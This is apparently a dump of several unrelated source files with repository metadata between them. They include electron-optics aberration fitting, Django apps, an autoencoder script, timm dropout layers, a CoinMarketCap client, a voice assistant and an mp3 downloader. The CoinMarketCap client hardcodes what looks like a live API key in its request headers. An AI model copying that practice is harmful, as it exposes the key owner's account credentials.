chi_i['A2'] = aberrations['A2'] * w_c ** 2
chi_i['A3'] = aberrations['A3'] * w_c ** 3
chi_i['A4'] = aberrations['A4'] * w_c ** 4
chi_i['C1'] = aberrations['C1'] * x
chi_i['C3'] = aberrations['C3'] * x * w * w_c
chi_i['C5'] = aberrations['C5'] * x * w ** 2 * w_c ** 2
chi_i['B2'] = aberrations['B2'] * (3 * x ** 2 + y ** 2 - 2j * x * y)
chi_i['B4'] = aberrations['B4'] * w_c ** 2 * (5 * x ** 2 + 6j * x * y - y ** 2)
chi_i['S3'] = aberrations['S3'] * 2 * w_c ** 2 * (2 * x + 1j * y)
chi_i['D4'] = aberrations['D4'] * w_c ** 3 * (5 * x + 3j * y)
chi_sum = 0 * w
for key in chi_i.keys():
chi_sum += chi_i[key]
return (2 * math.pi / wavelength) * np.real(chi_sum)
def diff_chi_y(wavelength, w, aberrations):
x = np.real(w)
y = np.imag(w)
w_c = np.conjugate(w)
chi_i = {}
chi_i['A0'] = np.zeros(w.shape, dtype='complex128')# aberrations['A0'] * (-1j) * np.ones(
# w.shape)
chi_i['A1'] = aberrations['A1'] * (-1j) * w_c
chi_i['A2'] = aberrations['A2'] * (-1j) * w_c ** 2
chi_i['A3'] = aberrations['A3'] * (-1j) * w_c ** 3
chi_i['A4'] = aberrations['A4'] * (-1j) * w_c ** 4
chi_i['C1'] = aberrations['C1'] * y
chi_i['C3'] = aberrations['C3'] * y * w * w_c
chi_i['C5'] = aberrations['C5'] * y * w ** 2 * w_c ** 2
chi_i['B2'] = aberrations['B2'] * (-1j) * (3 * y ** 2 + x ** 2 + 2j * x * y)
chi_i['B4'] = aberrations['B4'] * w_c ** 2 * (5j * y ** 2 - 1j * x ** 2 + 6 * x * y)
chi_i['S3'] = aberrations['S3'] * 2 * w_c ** 2 * (2 * y - 1j * x)
chi_i['D4'] = aberrations['D4'] * w_c ** 3 * (5 * y - 3j * x)
chi_sum = 0 * w
for key in chi_i.keys():
chi_sum += chi_i[key]
return (2 * math.pi / wavelength) * np.real(chi_sum)
def pi_4th(aberration, wavelength, gmax):
"""
Determines the pi/4 limit of the given aberration, electron wavelength and gmax.
Parameters
----------
aberration : str
Aberration: 'A0', 'A1', 'C1', ...
wavelength : float
in nm.
gmax : float
in nm^-1.
"""
lim = 0
if aberration == 'A0':
lim = 1 / (8 * gmax)
elif aberration == 'C1':
lim = 1 / (4 * wavelength * (gmax ** 2))
elif aberration == 'A1':
lim = 1 / (4 * wavelength * (gmax ** 2))
elif aberration == 'A2':
lim = 3 / (8 * (wavelength ** 2) * (gmax ** 3))
elif aberration == 'B2':
lim = 1 / (8 * (wavelength ** 2) * (gmax ** 3))
elif aberration == 'C3' or aberration == 'A3':
lim = 1 / (2 * (wavelength ** 3) * (gmax ** 4))
elif aberration == 'S3':
lim = 1 / (8 * (wavelength ** 3) * (gmax ** 4))
elif aberration == 'A4':
lim = 5 / (8 * (wavelength ** 4) * (gmax ** 5))
elif aberration == 'B4' or aberration == 'D4':
lim = 1 / (8 * (wavelength ** 4) * (gmax ** 5))
elif aberration == 'C5' or aberration == 'A5':
lim = 3 / (4 * (wavelength ** 5) * (gmax ** 6))
return lim
class ForwardModel(object):
def __init__(self, exp, sim, w_2d, wavelength, aber_list, offset=None, gmax=None,
phase_norm=False):
self.exp = exp
self.sim = sim
if phase_norm:
phase_diff = np.angle(np.mean(self.exp)) - np.angle(np.mean(self.sim))
self.exp = exp / np.exp(1j * phase_diff)
self.shape = self.exp.shape
self.fft_exp = fft.fftn(self.exp) / np.prod(self.shape)
self.fft_sim = fft.fftn(self.sim) / np.prod(self.shape)
self.wavelength = wavelength
self.aber_list = aber_list
self.y = np.concatenate((self.fft_sim.real.ravel(), self.fft_sim.imag.ravel()))
#self.y = np.concatenate((self.sim.real.ravel(), self.sim.imag.ravel()))
self.n = 2 * len(self.aber_list)
self.m = len(self.y)
self.Se_inv = identity(self.m)
self.w_2d = w_2d
self.gmax = gmax
if offset is None:
self.offset = create_empty_aber_dict()
else:
self.offset = offset
def aber_dict(self, x):
aber_dict = create_empty_aber_dict()
for i, ab in enumerate(self.aber_list):
z = x[i * 2] + 1j * x[i * 2 + 1]
if self.gmax:
aber_dict[ab] = z * pi_4th(ab, self.wavelength, self.gmax)
else:
aber_dict[ab] = z
for ab in self.offset.keys():
aber_dict[ab] += self.offset[ab]
return aber_dict
def __call__(self, x):
cq = chi(self.wavelength, self.w_2d, self.aber_dict(x))
exp_corrected = self.fft_exp * np.exp(1j * cq)
# exp_corrected = fft.ifftn(self.fft_exp * np.exp(1j * cq)) * np.prod(self.shape)
return np.concatenate((exp_corrected.real.ravel(), exp_corrected.imag.ravel()))
def chi(self, x):
return chi(self.wavelength, self.w_2d, self.aber_dict(x))
def apply_aberrations(self, x):
cq = self.chi(x)
return fft.ifftn(self.fft_exp * np.exp(1j * cq)) * np.prod(self.shape)
def jac(self, x):
cq = chi(self.wavelength, self.w_2d, self.aber_dict(x))
da = diff_chi_ab(self.wavelength, self.w_2d, self.aber_list, self.gmax)
h1 = (1j * self.fft_exp * np.exp(1j * cq)) * da.T
f = []
for g in h1:
f.append(np.concatenate((g.real.ravel(), g.imag.ravel())))
f = np.asarray(f)
return f.T
def jac_dot(self, x, vec):
return self.jac(x).dot(vec)
def jac_T_dot(self, x, vec):
jac_T = self.jac(x).T
return jac_T.dot(vec)
def hess(self, x):
cq = chi(self.wavelength, self.w_2d, self.aber_dict(x))
h = []
for ab in self.aber_list:
da = diff_chi_ab(self.wavelength, self.w_2d, [ab], self.gmax)
da_x = np.concatenate((da.T[0].real.ravel(), da.T[0].imag.ravel()))
da_y = np.concatenate((da.T[1].real.ravel(), da.T[1].imag.ravel()))
h.append(da_x)
h.append(da_y)
h = np.asarray(h)
f = []
for ab in self.aber_list:
da = diff_chi_ab(self.wavelength, self.w_2d, [ab], self.gmax)
da_xx = - da.T[0] * (1j * self.fft_exp * np.exp(1j * cq))
da_yy = - da.T[1] * (1j * self.fft_exp * np.exp(1j * cq))
da_x = np.concatenate((da_xx.real.ravel(), da_xx.imag.ravel()))
da_y = np.concatenate((da_yy.real.ravel(), da_yy.imag.ravel()))
f.append((da_x * h).T)
f.append((da_y * h).T)
f = np.asarray(f)
return f
def hess_dot(self, x, vec):
return self.hess(x).dot(vec).T
def estimate_std(self, x):
f0 = self(x)
delta_y = self.y - f0
chi_sq = (delta_y ** 2).sum() / (self.m - self.n)
# chi_sq = np.linalg.norm(delta_y) ** 2 / (self.m + 1 - self.n)
A = self.jac(x)
ATA = A.T.dot(A)
x_var = np.diag(np.linalg.pinv(ATA) * chi_sq)
x_std = np.sqrt(np.abs(x_var))
aber_dict = create_empty_aber_dict()
for i, ab in enumerate(self.aber_list):
z = x_std[i * 2] + 1j * x_std[i * 2 + 1]
if self.gmax:
aber_dict[ab] = z * pi_4th(ab, self.wavelength, self.gmax)
else:
aber_dict[ab] = z
return aber_dict
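# Sketch: evaluating the aberration phase chi on a small frequency grid.
# The 200 kV wavelength (~0.00251 nm) and the 100 nm defocus below are
# illustrative values, not taken from this module.
_gx = np.linspace(-5, 5, 64)            # spatial frequencies in nm^-1
_w = _gx[None, :] + 1j * _gx[:, None]   # complex frequency grid
_ab = create_empty_aber_dict()
_ab['C1'] = 100.0                       # defocus in nm
_phase = chi(0.00251, _w, _ab)          # 2D phase map in radians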
|
[
"noreply@github.com"
] |
FWin22.noreply@github.com
|
2c1bb0a5678204f10fe6d6ab94d7bb9e64a5ee8d
|
5ea1083441051cbc20a61ae7ee4097ca3354ef98
|
/FYPv2/FYP/users/apps.py
|
c75d3beeea5296e01fae7e316a96e3c1eff224a7
|
[] |
no_license
|
andrewodonovan/StudentCVA
|
5d886506c0181f1c40a16cf43ba5409679f34060
|
ec9ce5303cb41c7bec4d49c377194a22631968b8
|
refs/heads/master
| 2020-09-05T22:59:35.700633
| 2020-03-11T05:48:31
| 2020-03-11T05:48:31
| 220,231,954
| 0
| 0
| null | 2019-12-27T13:25:14
| 2019-11-07T12:28:01
|
Python
|
UTF-8
|
Python
| false
| false
| 136
|
py
|
from django.apps import AppConfig
class UsersConfig(AppConfig):
name = 'users'
def ready(self):
        import users.signals  # connect this app's signal handlers on startup
|
[
"36671447+andrewodonovan@users.noreply.github.com"
] |
36671447+andrewodonovan@users.noreply.github.com
|
1a27b2d2787079ad6353901e02b994eba48b5abc
|
b9e74f304d139de807c4ffdde7dad8e8dc8afc15
|
/main/views.py
|
01a87e3330e30de932accf98495af82c218b3d49
|
[] |
no_license
|
sanchoUa/MySite
|
4415699b6f63b9a093813c345e31d6386854f4fa
|
b4e79e6b9fd7df91e0eb291ade62594944f7a7ed
|
refs/heads/main
| 2023-08-24T22:35:28.407429
| 2021-09-15T19:24:08
| 2021-09-15T19:24:08
| 406,084,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
from django.shortcuts import render
from django.http import HttpResponseRedirect
def main(request):
return render(request, 'main/html/main.html')
def check(request):
name = request.POST['name']
print(name)
return HttpResponseRedirect('/')
|
[
"gladchuck.sah@gmail.com"
] |
gladchuck.sah@gmail.com
|
4ff65a73c99fd5e69a6e56e9e6689bd4a519ab47
|
a548e117474705ee8817ddea368628533619285e
|
/old_python_files/auto_encoder.py
|
c4202145b9923017f04c3ad21ed4bb40fbe72bd1
|
[] |
no_license
|
minghao2016/deep_learning_chemical
|
e07b664244981b2f0251671bd84a73f89e0b0934
|
157ef2530fb1c3d4bec19d310706da7220172870
|
refs/heads/master
| 2020-10-01T22:54:03.548660
| 2017-04-04T15:32:52
| 2017-04-04T15:32:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,731
|
py
|
import numpy
from scipy.sparse import csc_matrix
import h5py
import sys
import theano
import theano.tensor as T
from sda.utils import load_data, print_array
from sda.SdA import SdA
def main():
print('Loading data from file...')
f = h5py.File('feature_matrix.h5', 'r')
data = f['data'][:]
col = f['col'][:]
row = f['row'][:]
shape = f['shape'][:]
matrix = csc_matrix((numpy.array(data), (numpy.array(row), numpy.array(col))), shape=(shape[0], shape[1]),
dtype=numpy.uint8)
print(matrix.shape)
# exit(1)
batch_size = 10
n_samples, n_vars = matrix.shape
n_train_batches = n_samples / batch_size
numpy_rng = numpy.random.RandomState(23432)
# build model
print('Building model...')
sda = SdA(numpy_rng=numpy_rng, n_ins=n_vars,
hidden_layers_sizes=[int(sys.argv[2]), int(sys.argv[3]), int(sys.argv[4])])
print('configuring...')
pretraining_fns = sda.pretraining_functions(train_set_x=matrix.todense(), batch_size=batch_size)
print('training...')
pretraining_epochs = 15
pretrain_lr = 0.001
corruption_levels = [0.1, 0.2, 0.3] + [0.4] * sda.n_layers
for i in xrange(sda.n_layers):
for epoch in xrange(pretraining_epochs):
c = []
for batch_index in xrange(n_train_batches):
c.append(pretraining_fns[i](index=batch_index,
corruption=corruption_levels[i],
lr=pretrain_lr))
y = sda.get_lowest_hidden_values(matrix)
get_y = theano.function([], y)
y_val = get_y()
print_array(y_val, index=len(sys.argv)-1)
if __name__ == '__main__':
main()
|
[
"dennis@repositive.io"
] |
dennis@repositive.io
|
3a96d2d389ab9827a47e5c551cea7dc530bf0e9f
|
2af4e7f030b5f263b2f4dcaa253efd8049b8e669
|
/test/test_day10.py
|
cc9d8784991422162154a2e4fbea3fb915b91b17
|
[] |
no_license
|
thegeneralgeneral/advent-of-code
|
f99b9d9bbe26933ae922dac7485a1c08565c4f50
|
2d898087055964c28ea5d58619ce619a21b3c2f4
|
refs/heads/master
| 2021-01-10T02:31:26.685740
| 2017-05-05T19:39:56
| 2017-05-05T19:39:56
| 47,299,126
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,595
|
py
|
import unittest
import day10
class Day10_LookAndSayTests(unittest.TestCase):
def test_single_digit(self):
input_string = "1"
expect = "11"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_two_consecutive_digits(self):
input_string = "11"
expect = "21"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_two_different_digits(self):
input_string = "21"
expect = "1211"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_multiple_digits_1(self):
input_string = "1211"
expect = "111221"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_multiple_digits_2(self):
input_string = "111221"
expect = "312211"
self.assertEqual(expect, day10.look_and_say(input_string))
def test_three_unique_digits(self):
input_string = "3333113322"
expect = "43212322"
self.assertEqual(expect, day10.look_and_say(input_string))
class Day10_GenerateNextChunkTests(unittest.TestCase):
# Cut to the chase.
def test_split_input_with_three_unique_digits(self):
input_string = "3333113322"
expected = ["3333", "11", "33", "22"]
result = []
for yielded in day10.generate_chunks(input_string):
result.append(yielded)
self.assertEqual(expected, result)
# Day 10
# import day10
# my_string = "1113222113"
# for i in range(50):
# my_string = day10.look_and_say(my_string)
# print len(my_string)
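# The day10 module under test is not part of this record; a minimal
# look_and_say sketch consistent with the assertions above:
#
# from itertools import groupby
#
# def look_and_say(s):
#     # '1211' -> one '1', one '2', two '1's -> '111221'
#     return ''.join(str(len(list(g))) + d for d, g in groupby(s))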
|
[
"jenna.fingler@gmail.com"
] |
jenna.fingler@gmail.com
|
0af2b81d3059a23dc1cec1fba1bac61858c689d5
|
53e30c71358a17041d7a3d44c60c69aa6054c9d0
|
/timm/models/layers/drop.py
|
669dbf248332c8eb714938972f2ebdf9ee7445eb
|
[
"Apache-2.0"
] |
permissive
|
Qingfeng0623/pytorch-image-models
|
120234f92e9f3f47d6c7e768b3ad2d1a50c3a3a5
|
cc5a11abbaddef1aa3feb29009e57ca335b9cf57
|
refs/heads/master
| 2021-01-13T23:48:59.598846
| 2020-02-22T18:26:19
| 2020-02-22T18:26:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,298
|
py
|
""" DropBlock, DropPath
PyTorch implementations of DropBlock and DropPath (Stochastic Depth) regularization layers.
Papers:
DropBlock: A regularization method for convolutional networks (https://arxiv.org/abs/1810.12890)
Deep Networks with Stochastic Depth (https://arxiv.org/abs/1603.09382)
Code:
DropBlock impl inspired by two Tensorflow impl that I liked:
- https://github.com/tensorflow/tpu/blob/master/models/official/resnet/resnet_model.py#L74
- https://github.com/clovaai/assembled-cnn/blob/master/nets/blocks.py
Hacked together by Ross Wightman
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import math
def drop_block_2d(x, drop_prob=0.1, training=False, block_size=7, gamma_scale=1.0, drop_with_noise=False):
""" DropBlock. See https://arxiv.org/pdf/1810.12890.pdf
DropBlock with an experimental gaussian noise option. This layer has been tested on a few training
runs with success, but needs further validation and possibly optimization for lower runtime impact.
"""
if drop_prob == 0. or not training:
return x
_, _, height, width = x.shape
total_size = width * height
clipped_block_size = min(block_size, min(width, height))
# seed_drop_rate, the gamma parameter
seed_drop_rate = gamma_scale * drop_prob * total_size / clipped_block_size ** 2 / (
(width - block_size + 1) *
(height - block_size + 1))
# Forces the block to be inside the feature map.
w_i, h_i = torch.meshgrid(torch.arange(width).to(x.device), torch.arange(height).to(x.device))
valid_block = ((w_i >= clipped_block_size // 2) & (w_i < width - (clipped_block_size - 1) // 2)) & \
((h_i >= clipped_block_size // 2) & (h_i < height - (clipped_block_size - 1) // 2))
valid_block = torch.reshape(valid_block, (1, 1, height, width)).float()
uniform_noise = torch.rand_like(x, dtype=torch.float32)
block_mask = ((2 - seed_drop_rate - valid_block + uniform_noise) >= 1).float()
block_mask = -F.max_pool2d(
-block_mask,
kernel_size=clipped_block_size, # block_size, ???
stride=1,
padding=clipped_block_size // 2)
if drop_with_noise:
normal_noise = torch.randn_like(x)
x = x * block_mask + normal_noise * (1 - block_mask)
else:
normalize_scale = block_mask.numel() / (torch.sum(block_mask) + 1e-7)
x = x * block_mask * normalize_scale
return x
class DropBlock2d(nn.Module):
""" DropBlock. See https://arxiv.org/pdf/1810.12890.pdf
"""
def __init__(self,
drop_prob=0.1,
block_size=7,
gamma_scale=1.0,
with_noise=False):
super(DropBlock2d, self).__init__()
self.drop_prob = drop_prob
self.gamma_scale = gamma_scale
self.block_size = block_size
self.with_noise = with_noise
def forward(self, x):
return drop_block_2d(x, self.drop_prob, self.training, self.block_size, self.gamma_scale, self.with_noise)
def drop_path(x, drop_prob=0., training=False):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
This is the same as the DropConnect impl I created for EfficientNet, etc networks, however,
the original name is misleading as 'Drop Connect' is a different form of dropout in a separate paper...
See discussion: https://github.com/tensorflow/tpu/issues/494#issuecomment-532968956 ... I've opted for
changing the layer and argument names to 'drop path' rather than mix DropConnect as a layer name and use
'survival rate' as the argument.
"""
if drop_prob == 0. or not training:
return x
keep_prob = 1 - drop_prob
random_tensor = keep_prob + torch.rand((x.size()[0], 1, 1, 1), dtype=x.dtype, device=x.device)
random_tensor.floor_() # binarize
output = x.div(keep_prob) * random_tensor
return output
class DropPath(nn.Module):
"""Drop paths (Stochastic Depth) per sample (when applied in main path of residual blocks).
"""
def __init__(self, drop_prob=None):
super(DropPath, self).__init__()
self.drop_prob = drop_prob
def forward(self, x):
return drop_path(x, self.drop_prob, self.training)
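# Sketch: wiring the two layers above into a toy residual block. The
# probabilities are illustrative; both layers are no-ops in eval mode.
class _ToyBlock(nn.Module):
    def __init__(self):
        super(_ToyBlock, self).__init__()
        self.conv = nn.Conv2d(8, 8, 3, padding=1)
        self.drop_block = DropBlock2d(drop_prob=0.1, block_size=3)
        self.drop_path = DropPath(drop_prob=0.1)

    def forward(self, x):
        # residual branch regularized by DropBlock, then stochastic depth
        return x + self.drop_path(self.drop_block(self.conv(x)))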
|
[
"rwightman@gmail.com"
] |
rwightman@gmail.com
|
bc085641378bf880403d37ff53189561703ce8c0
|
406a432e49c5743443eaa8183076a78d43a13c5c
|
/tests/base/test_base_object.py
|
1218ea174091520a8a9506d495f70090f716e9e4
|
[] |
no_license
|
jpablo/superficie
|
ee4e0fafd048b3c73638673c0a535e74377ceacf
|
89f3429a942d1c0df6376d612b1243480084720a
|
refs/heads/master
| 2020-05-02T06:56:20.633622
| 2013-07-08T03:30:45
| 2013-07-08T03:30:45
| 1,643,874
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
import sys
import unittest
from superficie.base import BaseObject
class TestBaseObject(unittest.TestCase):
def test_BaseObject(self):
ob = BaseObject()
ob.show()
self.assertTrue(ob.visible)
ob.hide()
self.assertFalse(ob.visible)
ob.origin = (1,1,1)
self.assertTupleEqual(tuple(ob.origin), (1,1,1))
if __name__ == '__main__':
unittest.main()
|
[
"jpablo.romero@gmail.com"
] |
jpablo.romero@gmail.com
|
cefc05fd60c16b6ea1104ebe63259d9274b02629
|
3d853a74e2d5806e7c03b12adf01416c5a95df7e
|
/jarvis.py
|
681d556a34661ce874e7a0d3809b0fbc46548a85
|
[] |
no_license
|
stant581/JarvisAI
|
7064838442b93cc417365bc4e484ca938b9dcde8
|
e4edd4551c5aaef512e0d716a3b05644d108d45c
|
refs/heads/master
| 2020-07-13T19:36:16.945260
| 2019-08-29T10:43:52
| 2019-08-29T10:43:52
| 205,139,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,128
|
py
|
import pyttsx3 #pip install pyttsx3
import speech_recognition as sr #pip install speechRecognition
import datetime
import wikipedia #pip install wikipedia
import webbrowser
import os
import smtplib
engine = pyttsx3.init('sapi5')
voices = engine.getProperty('voices')
# print(voices[1].id)
engine.setProperty('voice', voices[0].id)
def speak(audio):
engine.say(audio)
engine.runAndWait()
def wishMe():
hour = int(datetime.datetime.now().hour)
if hour>=0 and hour<12:
speak("Good Morning!")
elif hour>=12 and hour<18:
speak("Good Afternoon!")
else:
speak("Good Evening!")
speak("I am Jarvis Sir. Please tell me how may I help you")
def takeCommand():
#It takes microphone input from the user and returns string output
r = sr.Recognizer()
with sr.Microphone() as source:
print("Listening...")
r.pause_threshold = 1
audio = r.listen(source)
try:
print("Recognizing...")
query = r.recognize_google(audio, language='en-in')
print(f"User said: {query}\n")
except Exception as e:
# print(e)
print("Say that again please...")
return "None"
return query
def sendEmail(to, content):
server = smtplib.SMTP('smtp.gmail.com', 587)
server.ehlo()
server.starttls()
server.login('youremail@gmail.com', 'your-password')
server.sendmail('youremail@gmail.com', to, content)
server.close()
if __name__ == "__main__":
wishMe()
while True:
# if 1:
query = takeCommand().lower()
# Logic for executing tasks based on query
if 'wikipedia' in query:
speak('Searching Wikipedia...')
query = query.replace("wikipedia", "")
results = wikipedia.summary(query, sentences=2)
speak("According to Wikipedia")
print(results)
speak(results)
elif 'open youtube' in query:
webbrowser.open("youtube.com")
elif 'open google' in query:
webbrowser.open("google.com")
elif 'open stackoverflow' in query:
webbrowser.open("stackoverflow.com")
elif 'play music' in query:
music_dir = 'D:\\Non Critical\\songs\\Favorite Songs2'
songs = os.listdir(music_dir)
print(songs)
os.startfile(os.path.join(music_dir, songs[0]))
elif 'the time' in query:
strTime = datetime.datetime.now().strftime("%H:%M:%S")
speak(f"Sir, the time is {strTime}")
elif 'open code' in query:
codePath = "C:\\Users\\Haris\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"
os.startfile(codePath)
elif 'email to harry' in query:
try:
speak("What should I say?")
content = takeCommand()
to = "harryyourEmail@gmail.com"
sendEmail(to, content)
speak("Email has been sent!")
except Exception as e:
print(e)
speak("Sorry my friend harry bhai. I am not able to send this email")
|
[
"stant581@gmail.com"
] |
stant581@gmail.com
|
ec46aee80711bebc37c3c8b0d3662a0125abb993
|
445a7b33191b006d125c831b37278954d600c6f4
|
/chemlab/survey/migrations/0012_auto_20171025_2236.py
|
8314aa61d7288ad006976ddd55418f3eee2c8bc8
|
[] |
no_license
|
doggra/chemlab
|
669f72b9080d1e08b8dc9dc4f62477ffcb0e1356
|
8996f4c01938f29edfd1aca4c57189abfdfc092a
|
refs/heads/master
| 2021-07-19T10:02:19.640651
| 2017-10-25T23:37:01
| 2017-10-25T23:37:01
| 108,335,269
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-25 22:36
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('survey', '0011_auto_20171025_2128'),
]
operations = [
migrations.RemoveField(
model_name='substancesurvey',
name='color',
),
migrations.AddField(
model_name='substancesurvey',
name='color',
field=models.ManyToManyField(blank=True, to='survey.Color'),
),
]
|
[
"Doggra"
] |
Doggra
|
10b0cb367fe9cfe352bbb33c3c15518d73793d26
|
99ada05e0088a8e93400b245c02fb0b28ef91a2d
|
/prototype_1/settings_development.py
|
2ddfbae5dd075df6398ee5a36f7db419aa7338cf
|
[
"MIT"
] |
permissive
|
eric-scott-owens/loopla
|
789fdf128393c29ced808b10e98eb55d5a0ed882
|
1fd5e6e7e9907198ff904111010b362a129d5e39
|
refs/heads/master
| 2022-12-12T17:30:44.373305
| 2019-08-01T06:17:05
| 2019-08-01T06:17:05
| 199,980,906
| 0
| 0
|
MIT
| 2022-12-11T00:23:28
| 2019-08-01T05:08:43
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 141
|
py
|
# Settings that are unique for localhost
from prototype_1.settings_shared import *
ALLOWED_HOSTS = ['127.0.0.1', 'localhost']
SITE_ID = 1
|
[
"eric.owens@loopla.com"
] |
eric.owens@loopla.com
|
eed768c5c1c19d00cc742271b1142a2d57a754c0
|
0bb119a63d0789f78fc8f371975920adc1f018b0
|
/crypto/cpc.py
|
9132650318a50b59a420cb7e46c0970f45b62884
|
[] |
no_license
|
suvranilghosh/Crypto-Search
|
ff1cf4515899d21769dea9bb9c56e953c9262133
|
ad05e51bb6791c9a9203c1be44085d5167cb182d
|
refs/heads/master
| 2023-04-29T20:06:57.839075
| 2021-05-15T01:48:14
| 2021-05-15T01:48:14
| 355,452,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 888
|
py
|
import requests
import json
headers = {
'X-CMC_PRO_API_KEY': 'ce2697eb-b5a1-43e3-800c-cfcc73debc90',
'Accepts': 'application/json',
}
def top100():
params = {'start': '1', 'limit': '100', 'convert': 'USD'}
url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest'
response = requests.get(url, params = params, headers = headers).json()
# print(response)
return response
def metaData(ticker):
params = {'symbol': ticker}
url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/info'
response = requests.get(url, params = params, headers = headers).json()
# print (response)
return response
def priceData(ticker):
params ={'symbol':ticker}
url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/quotes/latest'
response = requests.get(url, params = params, headers = headers).json()
return response
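# Example: chaining the helpers above. The JSON layout of the responses
# follows the CoinMarketCap API and is not asserted here; guarding with
# __main__ avoids network calls on import.
if __name__ == '__main__':
    listings = top100()
    btc_info = metaData('BTC')
    btc_quote = priceData('BTC')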
|
[
"sg1239@scarletmail.rutgers.edu"
] |
sg1239@scarletmail.rutgers.edu
|
9e8548713e54215e323eb85b01d2dd5df1e3e7f9
|
39f91dc49461df23550f292ee76249b26bcbcad4
|
/build/darknet_ros/catkin_generated/pkg.installspace.context.pc.py
|
712f62924ce78932da142da363af195cfff5688e
|
[] |
no_license
|
dkrystall/robosub_detection
|
efb997d5c87338c02bcb6dd59790d5a2717c8ca8
|
c1b70ab3017d2c367e8f458a5ee5870e815cc4e1
|
refs/heads/master
| 2022-12-01T23:40:59.044889
| 2021-01-21T19:50:20
| 2021-01-21T19:50:20
| 178,419,681
| 0
| 0
| null | 2022-11-22T05:46:45
| 2019-03-29T14:23:12
|
Makefile
|
UTF-8
|
Python
| false
| false
| 1,142
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/david/yolocam_catkin_ws/install/include;/usr/include".split(';') if "/home/david/yolocam_catkin_ws/install/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "cv_bridge;roscpp;actionlib;rospy;std_msgs;darknet_ros_msgs;image_transport".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-ldarknet_ros_lib;/usr/lib/x86_64-linux-gnu/libboost_thread.so;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so;/usr/lib/x86_64-linux-gnu/libboost_date_time.so;/usr/lib/x86_64-linux-gnu/libboost_atomic.so;/usr/lib/x86_64-linux-gnu/libpthread.so".split(';') if "-ldarknet_ros_lib;/usr/lib/x86_64-linux-gnu/libboost_thread.so;/usr/lib/x86_64-linux-gnu/libboost_chrono.so;/usr/lib/x86_64-linux-gnu/libboost_system.so;/usr/lib/x86_64-linux-gnu/libboost_date_time.so;/usr/lib/x86_64-linux-gnu/libboost_atomic.so;/usr/lib/x86_64-linux-gnu/libpthread.so" != "" else []
PROJECT_NAME = "darknet_ros"
PROJECT_SPACE_DIR = "/home/david/yolocam_catkin_ws/install"
PROJECT_VERSION = "1.1.4"
|
[
"dkrystall@gmail.com"
] |
dkrystall@gmail.com
|
358ba3cb018955bbe7e4c0e735b0ced43f6cee3e
|
f0a8fdf752b0c11157a5a90c880891c7fb509456
|
/auto-download-voice/auto-download/background.py
|
ecf5ca49baf0c7737d76d8edb53e7e6e62ba0b79
|
[] |
no_license
|
legenove/MyLearn
|
abde5d610562ebb8bf1410ee6f9ba6391001126d
|
d05e28ac550eb2306c11bd38b8515f929199295d
|
refs/heads/master
| 2020-05-20T23:11:04.414953
| 2017-12-29T07:33:11
| 2017-12-29T07:33:11
| 46,164,926
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,720
|
py
|
# -*- coding: utf-8 -*-
import os
import sys
import logging
import requests
import signal
from Queue import Queue
from multiprocessing import Process
PROJECT_ROOT = os.path.realpath(os.path.dirname(__file__))
sys.path.insert(0, os.path.join(PROJECT_ROOT, "..", "site-packages"))
from redis_model.queue import Worker
from load_data import get_url, mp3_file
def do_download(data):
file_name = data.get('file_name')
vid = data.get('vid')
key = data.get('key')
source = data.get('source')
store_type = data.get('store_type')
status = data.get('status')
mp3_path = mp3_file + file_name + '/'
if not os.path.exists(mp3_path):
os.mkdir(mp3_path)
mp3_final_path = mp3_path + vid + ".mp3"
if os.path.exists(mp3_final_path):
logging.error(vid+":000::exist")
return
url = get_url(key, store_type=store_type, status=status, source=source)
if url:
r = requests.get(url, timeout=(30, 30))
if r.status_code >= 400:
logging.error(vid+":111::not found")
else:
            code = None
            try:
                code = open(mp3_final_path, "wb")
                code.write(r.content)
                logging.error(data)
            except Exception, e:
                logging.error(e)
            finally:
                if code is not None:
                    code.close()
else:
logging.error(vid+":33::not found")
if __name__ == "__main__":
worker = Worker("background_download.mp3")
try:
worker.register(do_download)
worker.start()
except KeyboardInterrupt:
worker.stop()
print "exited cleanly"
sys.exit(1)
except Exception, e:
print e
|
[
"396410414@qq.com"
] |
396410414@qq.com
|
080cb7aacc20ed7a3c0eb6ae9b77b35201f1418e
|
fcb45715217e8c8b5fa220bb94c0804289b18258
|
/pageload/pageload/views.py
|
d3d57896e5344fa9f6d83b2b308fa75b04a5c5ef
|
[] |
no_license
|
SriramAditya/PageLoad
|
c948bfaa80c449ca3917e4d7e3d263114cfba1fa
|
722251e938258950f2efc703106ac4870b2afe36
|
refs/heads/master
| 2021-03-18T19:59:23.489253
| 2020-03-13T15:06:17
| 2020-03-13T15:06:17
| 247,096,561
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
from django.shortcuts import render
from .forms import LoginForm
import json
# pageload.json stores one JSON object per line, so the whole-file
# json.load is commented out and lines are handled individually
